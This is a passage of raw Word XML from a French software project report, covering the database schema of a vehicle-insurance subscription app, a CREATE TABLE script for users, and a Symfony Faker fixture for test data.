          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DATE, duration, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bonus_malus</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estimated_price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, status, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>created_at</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expired_at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">,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 xml:space="preserve">user_id,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 xml:space="preserve">vehicle_id,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formula_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F7253E" w14:textId="5074BBCE"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Subscription</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reference_number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, status, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>submitted_at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>processed_at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">,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 xml:space="preserve">user_id,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quote_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685C7A16" w14:textId="27183FA6" w:rsidR="00895C1B" w:rsidRPr="00CE5980" w:rsidRDefault="00895C1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Document</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name, type, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uploaded_at</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007922BB"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subscription_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722137D"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Brand</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19"/>
          <w:u w:val="thick" w:color="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00895C1B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715288FC"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b/>
          <w:bCs/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Model</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name, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>purchase_price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r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brand_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E1F04" w14:textId="77777777" w:rsidR="007922BB" w:rsidRPr="00CE5980" w:rsidRDefault="007922BB" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VehicleReference</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</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A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00895C1B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
          <w:u w:val="thick" w:color="000000" w:themeColor="text1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, year, </w:t>
      </w:r>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12745464" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00C65F1A" w:rsidRDefault="003A6B7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D63A1A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="005B775B" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc233817768"/>
      <w:r w:rsidRPr="005B775B">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>6.1.3 Modèle Physique de Données (MPD)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="1C7FACA6" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Le Modèle Physique de Données ci-dessous est issu de phpMyAdmin. Il représente la structure réelle de la base de données MySQL telle qu'elle a été générée par les migrations Doctrine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F0E6E" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="01A97FA9" w14:textId="2DF695DF" w:rsidR="003A6B7F" w:rsidRDefault="003E5F6D">
      <w:r w:rsidRPr="003E5F6D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E04DCC" wp14:editId="23157762">
            <wp:extent cx="4819898" cy="3683189"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="488285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85434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4819898" cy="3683189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9326DF" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="005B775B" w:rsidRDefault="003239D4" w:rsidP="007922BB">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc233817769"/>
      <w:r w:rsidRPr="005B775B">
        <w:rPr>
          <w:color w:val="004E9A"/>
        </w:rPr>
        <w:t>6.1.4 Script de création de la base de données</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="4E4726DB" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF" w:rsidP="007922BB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>La base de données est créée et mise à jour via les migrations Doctrine. L'extrait ci-dessous présente le script de création de la table user. Le script complet de toutes les tables est disponible en Annexe D.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA8FCE" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="6A6F96D6"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FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE</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user</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA75CB"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id       </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AUTO_INCREMENT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0485D5B9"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email    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>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180</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1D64E00B"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roles    JSON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41F3C490"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password </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>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255</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3FC8957D"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fname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>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50</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0D1BB9B3"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000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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267F99"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VARCHAR</w:t>
      </w:r>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50</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NOT NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAFC0F8"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UNIQUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> INDEX UNIQ_IDENTIFIER_EMAIL (email),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208AEC19" w14:textId="77777777" w:rsidR="007922BB" w:rsidRPr="00CE5980" w:rsidRDefault="007922BB" w:rsidP="007922BB">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PRIMARY KEY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C903441" w14:textId="77777777" w:rsidR="007922BB" w:rsidRPr="007922BB" w:rsidRDefault="007922BB" w:rsidP="007922BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DEFAULT</w:t>
      </w:r>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHARACTER SET</w:t>
      </w:r>
      <w:r w:rsidRPr="007922BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> utf8mb4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5D944" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRPr="007922BB" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="3B8CF738" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="003E12AF">
      <w:r w:rsidRPr="00790E86">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>→ Voir Annexe D pour le script complet de création de toutes les tables</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F50061" w14:textId="77777777" w:rsidR="00F868DD" w:rsidRDefault="00F868DD"/>
    <w:p w14:paraId="371C4555" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00790E86">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc233817770"/>
      <w:r>
        <w:t>6.1.5 Jeu d'essai et données de test</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="529C9B47" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00790E86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le peuplement de la base de données s'appuie sur les Fixtures Symfony couplées à la bibliothèque </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fakerphp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>faker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. La commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bin/console </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>doctrine:fixtures:load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --no-interaction réinitialise et repeuple la base avec un jeu de données de test reproductible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70408A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRPr="00555B5E" w:rsidRDefault="003A6B7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A8EEA5" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00CE5980" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>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UserFixtures.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32D81253" w14:textId="77777777" w:rsidR="00790E86" w:rsidRPr="00CE5980" w:rsidRDefault="00790E86" w:rsidP="00790E86">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>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load(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ObjectManager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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$manager</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>): void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2643C0A9"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042EA51"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$faker</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795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Factory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223CD82"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00FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</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User</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628FFB3F"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setFname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$faker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firstName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A68604"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        -&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setLname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$faker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lastName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37701109"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setEmail</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'admin@gmail.com'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614A47FB"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setRoles</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"ROLE_ADMIN"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE5980">
        <w:rPr>
